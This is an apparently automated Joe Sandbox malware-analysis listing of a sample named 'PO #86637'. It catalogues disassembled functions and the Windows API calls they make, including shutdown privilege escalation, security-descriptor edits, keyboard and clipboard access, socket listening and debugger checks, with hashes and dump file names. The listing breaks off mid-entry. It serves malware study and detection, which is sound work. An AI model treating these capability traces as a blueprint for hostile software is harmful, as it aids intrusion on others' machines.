                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                      • FindClose.KERNEL32(00000000), ref: 004429D4
                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                      • FindClose.KERNEL32(00000000), ref: 004429E2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 2640511053-438819550
                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                      Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                      • GetLastError.KERNEL32 ref: 00433414
                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                      • String ID: SeShutdownPrivilege
                      • API String ID: 2938487562-3733053543
                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                      Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                      • CopySid.ADVAPI32(00000000), ref: 00446271
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                      • String ID:
                      • API String ID: 1255039815-0
                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                      Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                      Download Yara Rule
                      APIs
                      • __swprintf.LIBCMT ref: 00433073
                      • __swprintf.LIBCMT ref: 00433085
                      • __wcsicoll.LIBCMT ref: 00433092
                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                      • LockResource.KERNEL32(00000000), ref: 004330CA
                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                      • LockResource.KERNEL32(?), ref: 00433120
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                      • String ID:
                      • API String ID: 1158019794-0
                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                      Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                      Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                      • GetLastError.KERNEL32 ref: 0045D6BF
                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                      Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$_strncmp
                      • String ID: @oH$\$^$h
                      • API String ID: 2175499884-3701065813
                      • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                      • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                      • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                      • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                      Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                      Download Yara Rule
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLast$closesocket$bindlistensocket
                      • String ID:
                      • API String ID: 540024437-0
                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                      Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                      • API String ID: 0-2872873767
                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                      Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                      • __wsplitpath.LIBCMT ref: 00475644
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • _wcscat.LIBCMT ref: 00475657
                      • __wcsicoll.LIBCMT ref: 0047567B
                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                      • String ID:
                      • API String ID: 2547909840-0
                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                      Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                      • FindClose.KERNEL32(?), ref: 004525FF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                      • String ID: *.*$\VH
                      • API String ID: 2786137511-2657498754
                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                      Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                      • String ID: pqI
                      • API String ID: 2579439406-2459173057
                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                      Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                      Download Yara Rule
                      APIs
                      • __wcsicoll.LIBCMT ref: 00433349
                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                      • __wcsicoll.LIBCMT ref: 00433375
                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicollmouse_event
                      • String ID: DOWN
                      • API String ID: 1033544147-711622031
                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                      Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: KeyboardMessagePostState$InputSend
                      • String ID:
                      • API String ID: 3031425849-0
                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                      Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
